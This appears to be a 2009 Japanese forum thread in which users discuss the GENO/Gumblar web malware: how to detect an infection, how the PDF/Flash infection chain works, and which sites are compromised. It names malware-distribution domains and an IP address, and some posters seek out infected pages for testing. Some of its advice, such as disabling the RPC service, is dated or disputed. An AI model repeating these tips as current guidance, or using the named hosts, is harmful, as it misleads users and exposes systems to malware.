1 :
名無しさん@お腹いっぱい。 :
2009/05/23(土) 03:25:05
2 :
名無しさん@お腹いっぱい。 :2009/05/23(土) 03:27:18
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「regedit.exe」と入力して「OK」ボタンを押す。
※立ち上がったことを確認したら弄らず閉じること。
3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
※立ち上がったことを確認したらAへ
Asqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
■確認方法
1.スタートから「ファイル名を指定して実行」
2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
→背景が黒いウィンドウが開いた場合3へ
→起動しない場合:感染疑い濃厚
3.背景が黒いウィンドウを選択。
小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー
Bavast!(無料のアンチウイルスソフト)で確認
http://www.btfree.info/file.php?action-get.html Code by: 790e3cc3feabad9
3 :
名無しさん@お腹いっぱい。 :2009/05/23(土) 03:28:21
感染予防対策(1) 1.Adobe Flash Player の最新版にアップデート 2.Adobe Acrobat Reader の最新版にアップデート 3.NoScriptの導入(Firefoxの導入) 4.Adobe Acrobat Readerの JavaScript 機能OFF 5.危険IPのブロック 諸事情でAdobe Reader 最新版を使わざるを得ない場合 2009年4月29日現在の最新版バージョン9.1設定例 1.Adobe Readerを起動し「編集」メニューの「環境設定」 「Acrobat JavaScriptを使用」のチェックボックスをオフ(チェックを外す) OKを押して設定確定後、Adobe Readerを終了。 ↓ 2.必要と好みに応じて Adobe Reader Speed-Up にてプラグインを整理 設定は SpeedUp - Fast がおすすめ。 注意すべきは Acroform(拡張子なし) Annotations(拡張子なし) これら2つのチェックボックスをオン(チェックが入っている)状態にしておく必要がある。 そうしないと Adobe Reader が起動しなかったりする。 このとき追加作業として EScript.apiとEScript.JPNのチェックボックスをオフ(チェックを外す)状態にしておくと より安心かもしれない。
4 :
名無しさん@お腹いっぱい。 :2009/05/23(土) 03:30:22
感染予防対策(2) 危険ポートを閉じることでセキュリティを強化する。 【ポート135の役割】 Windows2000/XPは、標準で分散オブジェクト技術(以下:DCOM)を利用しています。 このDCOMを利用すると、他のPCのDCOMソフトを遠隔操作できます。 遠隔操作をする場合に、相手PCに問い合わせをする時のに使用するのがポート135です。 場合によっては、遠隔操作をされてしまう可能性があるものですので、このポートは停止しておきましょう。 ポート番号「135」、「リモート管理・操作等のサービスへのアクセス」 ■ポート135を閉じる 「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。 「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」 をダブルクリックし、プロパティを開く。 スタートアップの種類を「無効」にし、OKボタンをクリックしプロパティ画面を閉じる。 変更をしたらPCを再起動する。 ポート番号「445」、「ファイル共有等のサービスへのアクセス」 ■ポート445を閉じる 「コントロールパネル」 ->「システム」 ->「ハードウェア」 ->「デバイスマネージャ」の「表示」メニューから 「非表示のデバイスドライバの表示」を選ぶと「プラグアンドプレイではないドライバ」という項目が一覧に加わる。 このツリーを展開して「NetBIOS over TCP/IP」のプロパティを開く。 ここで「ドライバ」タグを選択し、「スタートアップ」の種類を「無効」にする。 変更をしたらPCを再起動する。 以下はお約束 上に書いたことを行えば安全という保証はなく、すべて自己責任でお願いします。 またAdobe Reader&各ポートの環境設定をどうするかも各自考える必要があります。
5 :
名無しさん@お腹いっぱい。 :2009/05/23(土) 03:33:50
6 :
名無しさん@お腹いっぱい。 :2009/05/23(土) 03:36:44
アフィリンク抜けってのに 立てのがしたちくしょう
>>1 対応済
Flash Player 9.0.159.0 10.0.22.87
Adobe Reader 7.1.1 8.1.4 9.1.0
最新
Flash Player 10.0.22.87
Adobe Reader 9.1.1
お勧めhostファイル設定 127.0.0.1 geno.2ch.tc
かんちがいごめ
Adobe Reader Speed-Up検索しても出てこない
genoが突いてくるセキュリティホールは9.1.0で直ってるよ 9.1.1は別のセキュリティホール
前スレから貼っとく
799 :名無しさん@お腹いっぱい。:2009/05/22(金) 20:41:27
>>795 について自分も知りたい。
というか今回のウイルスは、
1)感染したサイトを閲覧すると、不正に埋め込まれたjsが不正なswfやpdfを開く
↓
2)脆弱性対策してないFlash PlayerやAcrobat Readerがクラッシュ
↓
3)クラッシュ時の脆弱性を悪用しマルウェアを実行
↓
4)実行されたマルウェアはPC内部にトロイを埋め込む
↓
5)埋め込まれたトロイプログラムは感染したPCのネットアクセスを監視、
FTPアクセスを監視してID/PWを盗む
↓
6)盗んだID/PWを使ってFTPアクセス先に不正侵入、
そのサイトに不正なコードを埋め込む
↓
1)に戻る、この繰り返しで感染範囲拡大
…のようだけど、てことはつまり、2)の時点でFlash PlayerやAcrobat Readerが
そもそも無ければ感染しないよね?
亜種やら何やらリスクあるから普段から、1)の時点でjs無効にしとくのがベストだと思うけど、
閲覧先の都合上、無効にできない場合もあるし…。
802 :名無しさん@お腹いっぱい。:2009/05/22(金) 20:46:56
>>799 に追加
それと、4)の段階はmartuz.cn等にアクセスさせられてトロイを仕込まれる、
と理解してるんだが違うのかな…?
あと、3)の挙動が良く分からない。
ソフトをクラッシュさせられるとマルウェアって実行させられるものなの?一般的に。
806 :名無しさん@お腹いっぱい。:2009/05/22(金) 21:21:54
>>802 3)クラッシュ時の脆弱性を悪用しマルウェアを実行
この脆弱性で場合によってはシステムを制御できるようになっちゃうから
それを利用して仕込むの
http://www.adobe.com/jp/support/security/bulletins/apsb09-04.html クラッシュ=マルウェア実行じゃなくて、脆弱性を使ってクラッシュさせて
システムを制御できるようにするのが目的
一度奪えればその間はなんだってできちゃう
こういう脆弱性とつながってない限りは単純なクラッシュだけじゃそうはならないよ
874 :802:2009/05/22(金) 22:24:19
>>806 詳しくありがd。
にしても、クラッシュさせてシステムを制御できる脆弱性って具体的にはどうなってるんだろ。
Flash PlayerやAcrobat Readerが使えなくなるだけなら分かるんだけど…。
926 :名無しさん@お腹いっぱい。:2009/05/22(金) 23:24:38
Gadgetadvisor.com の悪意ある IFrame
ttp://blog.f-secure.jp/archives/50243652.html fsecure_websecurity
ヘルシンキ発 by:ウェブセキュリティチーム
同サイトはAdobe AcrobatおよびReader用のPDFブラウザ・プラグインを検知すると、
スタックベースのバッファ・オーバフロー脆弱性(CVE-2008-2992)を利用する、悪意あるPDFファイルをロードする。
この攻撃の結果、util.printf JavaScriptファンクションをコールすることで、
Trojan-Downloader.Win32.Agent.brxrとして検出されるトロイの木馬が脆弱なシステム上に仕込まれ、
マシンにトロイの木馬をダウンロードする目的で、悪意あるァ & ェブサイトに接続することになる。
同トロイの木馬に感染すると、リモート攻撃者はそのユーザーのマシンにアクセスすることができる。
この攻撃は、以前の、修正パッチを当てていないバージョンのAdobeプログラムを標的としており、
最新のAdobeアップデートはすでにこの問題をフィックスしている。
詳細およびアップデートについては、Adobeの以下のページを参照のこと
:
http://www.adobe.com /support/security/bulletins/apsb08-19.html
AcrobatおよびReaderのJavaScriptファンクションを停止することで、この脅威を避けることも可能だ。
955 :名無しさん@お腹いっぱい。:2009/05/23(土) 00:26:13
Readerだけなら、この引用の人と俺は同じ考え。
>>926 見てたら見つけた。
Adobe Acrobat Readerに新たに2種の脆弱性
ttp://blog.f-secure.jp/archives/50237796.html 2009年04月29日13:18 サンノゼ発 by:パトリック・ルノー
以前にも言ったことだが、繰り返しておく価値があるだろう。すなわち、Adobe Acrobat Readerに
代わる物を使用せよ、だ。特定のPDFリーダーを薦めるということはしない。
様々な種類のリーダーを使用する方が望ましいと考えるからだ。
各種リーダーのリストについては
http://pdfreaders.org/を参照して欲しい 。
そのほかにはFoxIT、CutePDFなどがある。
Adobe Acrobat Reader以外のものを使用することができない場合は、
JavaScriptを実行する機能をオフにしておくことを強くお勧めする。
編集→初期設定で「Adobe JavaScriptを使用」のチェックをはずすことにより、簡単にオフにできる。
976 :名無しさん@お腹いっぱい。:2009/05/23(土) 02:22:47
960 :192.168.0.774:2009/05/23(土) 00:13:09 ID:FQnBqUEn0
Adobe ReadeとAdobe Flash Playerを最新にして、
Readerのスクリプトはオフ、ブラウザのスクリプトはオン、
アンチウィルスを外して該当コードがあるページを踏んでみた。
感染しないみたいだな。
もう 9.1.0までの穴つく亜種が出てるのかと思った
まぁ3日も前からmartuzが死んでるんで 感染するはずないんですけどね
接続先は変化する罠
前スレの1000が何を言ってるのかサッパリ
賛成するかはともかくナに言ってるかはわかる
いやわからん
で、感染したまま放置してるサイトのリストとかないの? 痛いニュースが感染したとかいくつかもスレで見たんだが
@echo off reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32" > hoge.txt これをテキストファイルに貼り付けて hoge.batに名前変えて 実行してできたhoge.txtみて絶対パスの怪しいのがあればお疲れ様でした
別所さん
(´・ω・`)何かしらの専門家である私に言わせればか弱いJSを保護する為にブルマーのごとき最強な装備させれば大安心であり大正解であり大勝利でもあるということですな
31 :
前749 :2009/05/23(土) 07:45:53
前スレの749です。
>>前804
Adobe Flash Playerが、何やら入っていたのを確認しました。
「プログラムの追加と削除」で出てこないのですね。
とりあえず、Adobe ReadeとAdobe Flash Playerを削除しちゃいます。
>>20 の976もあるようなので、これで大丈夫かなと思います。
いろいろとありがとうございました。
>>31 flash消すのはいいけどyoutubeとか見ないんすか?
これってSpyware Blasterとルーターで即市じゃね? という俺の妄想はどうですか?
的外れ ルータ関係ない。 そのソフトも定義ファイルがないと動かん
>>31 うちのはプログラムの追加と削除で出来るんだが…
サイトがスクリプトを使用しなくなるように念じる。
念じてもだめだったから fox全サイトの許可をしても開きません
FlashPlayerのアンインストールはツールを使うのが基本だ バージョンアップ時も一度アンインストールしてからじゃないとうまくいかない場合がある
このウイルスにかかりたくて いらないパソコンで感染サイトに行ったのに全然感染しません セキュリティーソフトは入れてません 他に何したらいいの
踏んだマシンにウイルスをDLさせるドメインが死んでるという話だし
>>44 俺VISTA
プロセスの数は?
俺167個
旅館ふくぜんに誰か忠告してあげた? ああいうサイトが感染してるとやばいと思うけど。
忠告した方がいいのかな?
メールでもしようかと思ったけど 「突然すみません。貴サイトがウイルスにやられています」 じゃ信じてもらえないかなと思ってやめた。
今から電話してみる
めちゃくちゃ怪しまれたw インターネットがわかる担当者がいないんでわかりませんとの事でした
メールで「グーグルで当サイトの名前を検索してみてください。」で良いんじゃないか?
>>54 それ言ったら「私にはわかりません。わかる担当も居りません」っていわれちった
>>53 マジ乙
ネットの知識が皆無な人にこれが結構クリティカルなことだとわからせるにはどうすればいいのかなあ
わかる担当が出勤する日まで放置か?
あわわwwwwwww
居ないなら連絡取ってくれ と言いたいぐらいの事態なんだがなあ
>>49 旅館ふくぜんの上位プロバイダーに言えばいいんじゃね?
ドメイン貸してるとこ。
つーか、リアル社会で毒物を放置してたら処理されるのに
ネット上では放置してても無罪なのが 21世紀じゃねーよな、、、
>>55 うわー
ことの重大さを理解していない
利用者に被害が
って強調すればさすがに動くかもね
居りませんってwww
キレられるの覚悟で強く担当を呼ぶように言うしかないかもね まずは結構深刻な事態であることをわからせた上で 俺?俺はそんな話術ないよ・・
ネット警察的な所に通報とかできないの?
あなたがたのHPがこんぴゅーたうぃるすに感染している →こんぴゅーたうぃるすは見た人のパソコンを壊すものである →つまり予約しに閲覧した人のパソコンが壊れる →パソコンを壊したら迷惑をかけるだけでなく器物破損で訴えられる →さあわかったら担当者を出せ こんな感じで
嫌がらせや冗談ではないとも言ったが、相手のおっちゃん、なんかめんどくさそうだった 「わざわざありがとうございました」ってw 2〜3日前に電話した観光協会のおねーさんとは楽しく話せたのになw
ふくぜんならFIREFOXで超反応するし FIREFOX3で自サイトを見るように仕向けたら 危険ってことがわかるんじゃねぇの
そのサイトはGENO感染してるって確定なの?
>>53 あー ありがとう
やっぱり思ってるだけじゃなくて動かないとな…
誰でも通れる場所に豚インフル患者放置してるようなもん って言えばいいよ
まずパソコンのイメージができてない人に例え話してもよく理解してくれないと思う
顧客情報とか流出してるんじゃねーのwww
ふくぜんの従業員にねらはいないのか…
・感染してるのは確定 ・利用者に被害 ・個人情報の流出 これだけ言っても「はぁそうですか」的な反応なら諦めろ
あなたがたが知らぬうちに加害者になってる可能性があります これで
旅館が業者に委託して作成したホムペならその業者に責任があるけどね
今更で申し訳ないのですが、WindowsMEだと感染しないのでしょうか? メインのXP機がだいぶ前に電源が壊れて修理中で、昔使ってたME機でネットしてるのです… Adobe ReaderやAdobe Flash Playerは最新版に更新できないし、まとめサイトなどにある感染確認の方法もできないしで不安です。 MEのような時代遅れで申し訳ありませんがよろしくお願いいたします。
メインPCの挙動がおかしくなってきてGENOのまとめ見たら 症状かぶりすぎ感染確定オワタ
いま気がついたけど、ふくぜんて.comと.orgがあるのね 感染しているのは.comの方だけだ もうちょっと調べてから電話すればよかったかな?
>>79 regedit開けるか?
SQLSODBC.HLPのサイズは?
ちなみにMEにcmd.exeは無い
hlpなのか?dbじゃなくて
旅館組合とか観光協会に電話でわかる人いないかな
>>80 Asqlsodbc.chmのファイルサイズの確認を確認する
■Windows XP:
改ざんされていなければ
C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
■Windows 2000:
そもそも存在しないはずなので、
C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
これの結果教えてくれ
Adobe Acrobat Reader を使わない人はインストールしなければいいんだよね? Adobe Flash Player だけ最新版にしています。
>>86 使わないソフトはインストールする必要なし
ただしAdobe Reader(古い場合はAdobe Acrobat Reader)はメーカー製PCなら
高確率でプリインストールされているので、本当に入ってないか
プログラムの追加と削除から確認してください
>>87 ChromeやFireFoxがブロックしても「このサイトをみる」を押して
続行する、天然の強者もいるだろうなw
>>87 whois調べた感じだとtsukaeru.netがホスティングしてるのかな
とりあえずJPCERTには連絡するわ
他もあったらまとめて連絡するんでリンクしない程度に貼ってくれ
また、楽天かw
>>85 さっきメインPC起動したんだけどcmdが開けないんだ。
ファイル名を指定して実行→cmd入力→PC重くなる→そのままなにも起こらない
って感じ
ただ事じゃねぇなこりゃ・・・
>>86 >>17 を見る限りAcrobat Readerがインストールされてなくても意味ないんじゃないだろうか
1)の段階で、pdfは開かなくてもswfを開いてFlash Playerがクラッシュしちゃうんじゃないの?
まあ最新版だから大丈夫だとは思うけど・・・
>>94 感染濃厚やな・・・
ちなみにsystem32\sqlsodbc.chm のサイズは?
vista奈良GENOウイルスはかからんとですか?
vistaでも感染したってレスあったよ
>>100 dです、やっぱり対策はちゃんとせにゃいけんですね
一番わかりやすいのはsqlsodbc.chmを開いてみればいい。 反応がなかったり、開けませんとかダイアログが出たらほぼ感染間違いなし。 正常なsqlsodbc.chmならデータソースウィザードヘルプが立ち上がって データ ソース ウィザードの最初の画面と表示されるはず。
↑ヘルプ関連の機能が有効になってないと確認できないので念のため。
>>105 標準では有効になっている。
だから、有効無効の切り換え方がわからないようなら有効になっているはず。
>>87 のふくぜんってとこが感染してるのは確定なの?
だとしたら、対応した人危機感ねーなーw
従業員一同、手の消毒や口内洗浄を徹底しておりますのでご安心ください とか言われそうだな
>>105 ファイル名を指定して実行→services.msc→OK
Help and Supportの項目でスタートアップの種類が自動、
もしくは手動になってれば有効。
働いている人に質問だけど、 会社でこのウイルスに関する話題が上る事ってある? ウチの場合は、誰も知らないまま普通にパソ使っててちょっと怖えぇ。 俺の方から伝えてみても、だからと言って会社でどうこうという方向にも行かず。 豚インフルは大騒ぎしてるけど、これもある意味重要な情報だと思うんだけどなー。
>>84 1323バイトだた
もうリカバリするしかないかな
>>113 え!?
そんなに小さくなるの?
別の見てるんじゃないよね
似たくさいの沢山あるから
>>114 俺がVMで感染させた時もそれくらいのサイズだったよ。
中身は一見無意味な文字列。
>>87 今ソース見たけど修復されたっぽい。
更新日時は5/23 13:30:46
お前のところのHPでウイルスに感染した、もしくは 感染しそうになったって怒り口調で言った方が効き目あるよ
>>116 どこのソース見た?
fukuzencomは修正されとらんがな
www●fukuzen●comは改竄されたまま
>>114 やり方よくわからなかったから
ファイル名を指定して実行→system32入力→検索でsystem32\sqlsodbc.chm入力
でsqlsodc コンパイル済みHTMLヘルプファイルっていうのが出てきたんだけど全然違うの?
system32\sqlsodbc.chmの容量が50KB前後で 開ければおk
>>120 ああ、すまん。楽天の方じゃないのか。
たしかにそっちは感染したまんまだ。
コンパイル済みHTMLだからヘルプ機能使わなくても開けるね
>>122 それで合ってるし、間違いなく感染してる。
試しにメモ帳で読み込んでみ?
変な文字列が出てくるから。
なあんだ、期限切れでもないのにavastさんの自動更新が死んでたのはそういうことだったのか \(^o^)/なあんだ
130 :
122 :2009/05/23(土) 14:18:09
リカバリしてくる 皆ありがとう
sqlsodbc.chmって結局何に使ってたんだろうな。 感染させて放置してもサイズが増えていったりもしないし、内容も 変わらずそのままなんだよな。
外部にHP作成依頼してたらそこの会社のPCが感染してるんだよね? 該当HPのところに問い合わせてもだめなんじゃないか?
>>106 1.lolipopによって削除されてる模様
2.問題のスクリプトは見当たらない
3.スクリプト残留確認
4.403 Forbidden TOPは特に無し
5.問題のスクリプトは見当たらない
問題あるのは3番目だけかな。
でも直接リンク貼るのはやめてね><
>>49-128 旅館ふくぜんのサイトは、レンタルサーバー管理会社の方に 5/22 18:19頃 報告いれてあります。
あとは修正されるのをおとなしく待て。騒ぎすぎるな。
ただ、abuse窓口の登録メールアドレスに届かず、Webのフォームからその他のお問い合わせで
投げてるので、対応まで時間がかかると思われる。土日休みなら、対応は月曜日以降だろう。
意味不明なアルファベットの羅列が一行だけだった あれで何かできるとはとても思えない
>>136 感染PCのシリアライズか、bot動作のオプションスイッチの類かもよ。
>>136 >>133 のサイトを見ると説明が書いてあった。
-----
このトロイの木馬は、ネットワークトラフィックを監視し、
FTP アカウント情報を盗み取り、次のファイルに保存します。
%System%\sqlsodbc.chm
注意:オリジナルの %System%\sqlsodbc.chm ファイルは上書きされます。
-----
FTP接続すれば何か増えるかもしれないね。
>>133 駆除されたり検疫されたファイルが提出された数なんかで危険度の
ランキングしてるんじゃないかな?
対応がだいぶ遅れたし、感染PCはSymantecのサイトに繋がらなかったり
するし、ウィルス配布サイトが停止する前後にウィルス定義が公開されたり
という要素が絡んでるんでない?
>>133 危険度ランクってページがあったけどgoogleキャッシュでしか残ってなかった
「Symantec 危険度」でぐぐればでてくるよ
危険度1
ユーザに対する脅威になる可能性はほぼ皆無で、話題に取り上げられることも
ほとんどありません。蔓延しているという被害届けもないタイプです。
危険度2
危険性が低いか、または中程度(しかし、さほどの影響はなく、対処も十分可能)
、あるいは、大規模な被害または増殖活動を行わないタイプのもので、
特性によってはニュースで大きく取り上げられるウィルスがこの部類に入ります。
危険度3
かなり蔓延度が高い(有害性は低く、抑制可能)か、あるいは、蔓延した場合に
危険な(かつ抑制不可能)タイプです。
危険度4
危険な脅威タイプで、抑制も困難です。
最新のウィルス定義をすぐにダウンロードして、事態に備えてください。
危険度5
非常に危険なタイプの脅威で、抑制も極めて困難です。
このタイプの脅威に備えるには、最新のウィルス定義をただちに
ダウンロードし、全てのマシン上でウィルススキャンを実行してください。
>>139 なるほど、ネットの噂話レベルではなく、自分とこで把握した数字のみで判断とか、
そういう基準があるかもしれないですね。
USBトロイの時なんか、ウチの会社だけで30台はやられたのに、なんでこんなに
簡単な書き方してるんだ、とイラッとしたりしましたがw
ちゃんと通報しないといけないか。
お前らせっかく俺が
>>28 でchmみるより確実な方法伝えたのに試さないのかよ
cmd立ち上がるなら
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32"
を入力するだけでいいから試せよ
>>140 あれれれ? だったらせめて危険度2だよね。不思議だ。
>>138 それが増えなかったんだよね。
ホスト側でパケットを監視しながら、別VMのftpサーバにアクセスしても、
感染VMがスクリプトを埋め込むだけで、外部へのパケットは一切流れな
かった。
ウィルスの動作が制作者の意図通りでなかったのか、あるいは感染が一気に
広まりすぎて、足が付きかねない動作を殺してたのか。
旅館とかに電話するなら 客を装ってみて 大分悪意のあるサイトの様だが しっかり旅館やってんのか、とかして聞いたほうがいいんじゃねーか? 割とかかってくるいたずら電話も多いから警戒する、俺の場合(旅館じゃ無くてホテルのバイトだが
>>143 1か2だとおもう
Symantecちゃんから見たらこの程度は1なのかもしれない
外務省の海外危険情報みたいなもんだな
>>144 感染VM自身がスクリプトをうめこむの?
それじゃFTPパスワード盗む必要がないような
実際挙動は凄まじいけどやってることはたいしたこと無い品
>>148 複数の書き換え手段を用意してても不思議ないっしょ。
>>150 複数の手段を用意してても不思議ではないが
そんな報告が国内外のどこにも無いのが不思議
>>151 ん〜、パケットを拾い損ねたとは思えないんだけどなぁ。
「ブルースクリーン オブ デス」ってカッコイイ響きだな 古風なRPGに出てきそう
>>151 思い出した。
ftpdのログにも別IPからの接続は記録されてなかったよ。
155 :
名無しさん@お腹いっぱい。 :2009/05/23(土) 15:22:14
>>154 お前鯖管なの?
とりあえず貴重な情報サンクス
>>131 そのファイルじゃ 感染の判断つかなくなってるん?
っていうか、今は配信停止してるから感染しても機能はしないだろ
>>82 即レスいただいていたのに遅くなり申し訳ありません。
regeditは開きました。
レジストリエディタが起動しました。
SQLSODBC.HLPはプロパティを見ると、サイズが17,148バイトで、ディスク上のサイズが24,576バイトでした。
いかがでしょうか…?
よろしくお願い致します。
おれは鯖味噌缶がすきだ
鯖水煮缶も好きだな
未だに改竄されたままのHPなんてあるの?
>>1 やまとめにある「再起動時にBSOD」っていうのは、LAN抜いてた場合?
久々にGENOスレに来て、浦島状態なんだけど、 martuz.cnも閉鎖したってことは、今現在はどんなに無防備状態であっても GENOには感染しないわけだよね。 仮に今も感染状態にあるサイトを見たとしても、martuz.cnが閉鎖しているから、 アクセスしたユーザーは感染することはないと思ってるんだけど。
環境によるってだけ マルウェアはすべての環境で完璧に動作するよう徹底的にテストしたり 行儀よく公開APIだけを使ったりする必要なんかないから
>>159 >SQLSODBC.HLP
似た名前がいっぱいあって混乱するよねー
GENOなんか数あるウィルスの一つに過ぎんからな 油断してると、別物にやられるだけ
>>169 gumblar.cnはIP変わって復活してるね
IP貼って
CIDR: 71.6.128.0/17
>nslookup gumblar.cn サーバー: web.setup Address: 192.168.0.1 権限のない回答: 名前: gumblar.cn Address: 71.6.202.216
ほんとしつけえやつだよなあ いつまで続ける気なんだろ
>>173 レジストラが止めたからレジストラの宣伝ページになってるだけで
マルウェアのダウンロードサイトが復活したわけではない
官能小説の部屋 haru0425.h.fc2.com このエロ小説サイト、トップ頁以外はチェッカーで1000%だす。 グーグルでも危険認定されてる
あのカスチェッカーまだ使ってる奴いたの
アンチ乙
また活動し始めた?
役に立たないと思うけどなぁ 宣伝の甲斐あって使ってる人は多いだろうけど
記事に取り上げられたくて必死なんだろ > チェッカー
インターネット板のほうもチェッカーテンプレだな 案の定酷い有様
>>159 遅くなってすまん
俺のMEもサイズが17,148バイトで、ディスク上のサイズが24,576バイトだ
ちなみにwin98使いの↓の場合
−−−−−−−−−−−−−−−−−−−−−−−
962 : ◆N9P3SuvBPo :2009/05/18(月) 00:20:13
現在win98使ってて、GENOウイルスに感染してるか知りたい人へ
SQLSODBC.HLP
(C:\WINDOWS\SYSTEM32ではなく、“C:\WINDOWS\SYSTEM”の中です)
のファイルサイズが
16.8KB (17,302 バイト)、24,576 バイト使用 で
更新日時が
1999年5月5日 22:22:00 で、あれば問題ありません。
−−−−−−−−−−−−−−−−−−−−−−−
ですが
基本的にそのファイルを開いてみて
データ ソース ウィザードの最初の画面と出てくれば、感染してません
>>155 鯖管もしてるんで、挙動を確認しておこうかなと。
>>158 17日から始めて、別種でも試そうかと思ってたら配布元が停止してしまった。
>>186 ageてるのが荒らしだなw
実にわかりやすい
■↓■テンプレ案■↓■
>>4 をまるごと削除。
■↑■テンプレ案■↑■
理由1: GENOウイルスとは関係ない。
理由2: 初心者には変更が難しく、各自でどうするかを考える必要がある(混乱を招くおそれ)。
理由3:Remote Procedure Callを止めると、これに依存している複数のサービスが機能しなくなる。
例えば、その中にBackground Intelligent Transfer Serviceがあるが、これはWindowsUpdateに使われる。
よって、Remote Procedure Call サービスを無効化すると、WindowsUpdateがうまくいかない場合がある。
理由4: ルーター側の設定(機能)とPCの設定にもよるので一概にはいえないが、
PCがネットにつながらなくなったり、つながるまでに時間がかかるようになる。
GENOウイルスには関係ないと知っているが、
これを機会にこれらの危険なポートを塞ぎたいのであれば、サービスを停止するのではなく、
ルーターで行うのがおすすめ。
たとえば、YAMAHAの製品などは初めから該当ポートを塞いである(全てかは知らん)。
PCの脆弱性(ただしマイクロソフト関連の脆弱性に限定)に不安があるなら、
マイクロソフトのMBSAで、パスワードからサービスまでを含めて調査可能。
以上、
>>4 を残しておくのがこのスレにふさわしいのか、必要なさそうなのか、ご検討をよろしく。
>>180 TOPについてはソース確認した感じだと問題なさそう
他は知らん
チェッカーの人はこのまま事態が収束したら憤死するだろうな
>>190 Windowsファイアウォールはインターネットに対してポート135, 445を開かないよう
最初から設定されてる(VistaはもちろんXPのSP2以降も)。いらないでしょ
テンプレ修正するなら
>>165 もよろしく
ActiveX版インストーラの入手先は調べてないけど
チェッカー叩きする俺たちカッコイイ!
で、だいたい
>>194 みたいな反応だよな
乙とか必死とか。
196 :
初心者@レン様萌死 :2009/05/23(土) 17:56:42
皆様こんにちは
Meってどうなんだろう これが固定ならMeは相手にされてないのかも HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32\ Genoが偶然スルーしていたとしても決してMeが安全というわけじゃないよ
曖昧な判定しかできない上にアフィ満載 本人曰く亜種対策らしいけどな
>>197 ウイルスがregeditの起動を阻止する方法もWin9xでは使えないし
テンプレに書かれてることはWin9xには当てはまらないと思ったほうがよさげ
>>197 HKLM\System\CurrentControlSet\Control\MediaResources\
になるんじゃないの?98もMeももって無いから確かめようがないが
あっちのスレ立てたのはvipper臭い ageるし前スレの感じとか
Adobe Reader7.0のJavascriptを切ったんですが これで感染することはなくなったんでしょうか? あと7.0以外にも5.0とか6.0も入ってるんですが削除しちゃった方がいいんでしょうか?
なんだか幽霊みたいに存在感のないウイルスだな。
アンチチェッカーは使いこなせなくて文句いってるだけだろカス
>>190 うん、削除でいいと思う。
RPC止めるってのはねーわ。
ジョークツールなんだからそんなに必死にならなくても
>>203 > あと7.0以外にも5.0とか6.0も入ってるんですが削除しちゃった方がいいんでしょうか?
どういう理由で入ってるのか分からないから何とも言えない
7.1.1にバージョンアップしないでJavaScript切って済ませようとしている以上
7.0でないと困る理由があるんだろうし
> その後、次の Windows API をフックして、新規に作成されたすべてのプロセスを挿入します。 > kernel32!CreateProcessW どう見てもWin9xには関係ありません 本当にありがとうございました
>>187 わざわざ、ご丁寧にありがとうございます。
今更、MEでセキュリティもないかもですが、今回はだいじょぶそうで安心しました。
皆様のWin9x系についてのご助言もありがたく思います。
またお世話になるときにはよろしくお願いいたします。
>>209 いえ、特に理由はないです
最近使った覚えもないし、たぶん前のが残ってるだけだと思うのですが…
7.0でないと困る理由も特にないです
JavaScriptを切るよりバージョンアップした方がいいならそうしようと思います
このトロイの木馬は、次の文字列を含む URL がアクセスされると、自分自身を削除します。 DaonolFix なんて駆除が簡単なんだ
>>212 ごみが残ってるだけならいったん全部アンインストールして
9.1を入れなおすのが良いと思うよ
んでそのあとJavaScriptオフ
>>207 こいつがブロックしようとしてるgmerってのはどういうものかわかったけど、
le38ってなんだかわからない。
>>214 そうなんですか
分かりました、ありがとうございます
>>215 GMERと同様のツールなんだろうね。よく知らんけど。
>>215 Rootkit Unhookerぽいな
よくわからんけど
ウイルスが便利なツール教えてくれてるな
>>210 MSだけでなくウイルスにも見放されたwin9x
>>173 Hack鯖のPort8080が開いてる
ほかにPort22(遠隔操作用) Port25 Port80 Port110 Port135 を開けているが何をするつもりだ
ブラウザで直接アクセスしても弾かれる
Port137-139 Port445は閉じられていた
感染する状態なのか、誰か感染してみてくれ
うこっけいと出版社もそうだよね
セキュリティなし、フラッシュ最新、リーダーなしでふくぜん見たけど感染はなかった
GENOウイルスが活動開始か JSが、Gumblar.cnに飛ばす感染サイトが危ないな
>>222 gumblar.cnを指定しているスクリプトをVMのapacheに書いて踏んでみたけど
何も落ちてこないね。
IP変えたり、イーモバ接続で踏んでみても駄目だ。
アンチチェッカー沸いてたのか なんかいつも急に現れて急に同意する連中がこぞって現れるな ま どうせ自演なんだろうけど
ラトビア→ロシア→イギリス→アメリカ 大西洋横断しました
gumblar.cnの開始の意図はなに?
>>230 ラトビアZlkon → ロシアGumblar → イギリスMartuz → アメリカ???
アメリカ初耳なんだが誰かkwsk!
gumblar.cnで感染してて放置されてるところ知らない? 踏んでみるけど。
>>222 の
Port135はFILTEREDの誤りスマソ
結局parked.everydns.netかよ 死ねよ
ほとんどmartuz.cn行きかorz
>>237 やっぱり落ちてこないわ。
ただ、さっきもVM経由でアクセスしたから、俺のところに割り当てられるIP範囲が
焼かれちゃってる可能性もある。
gumblarで中国の感染サイト1つ見つけた。
危険な旧AdobeのURL希望
中国のgoogleは、検索する用語は赤字になるのだな。
>>241 太字にすると漢字が潰れて読めなくなるからな
ヘェー
で、バスターさまはまだ対応してないの? なにやってんの? うまい棒でも食べてんの?
バスター亜種は知らんが対応してます
> Flash Player 2 ここまで来ると逆にFlash Player 1が気になる
249 :
名無しさん@お腹いっぱい。 :2009/05/23(土) 22:43:52
解析したいんだが、現在、まだ感染しているページある?
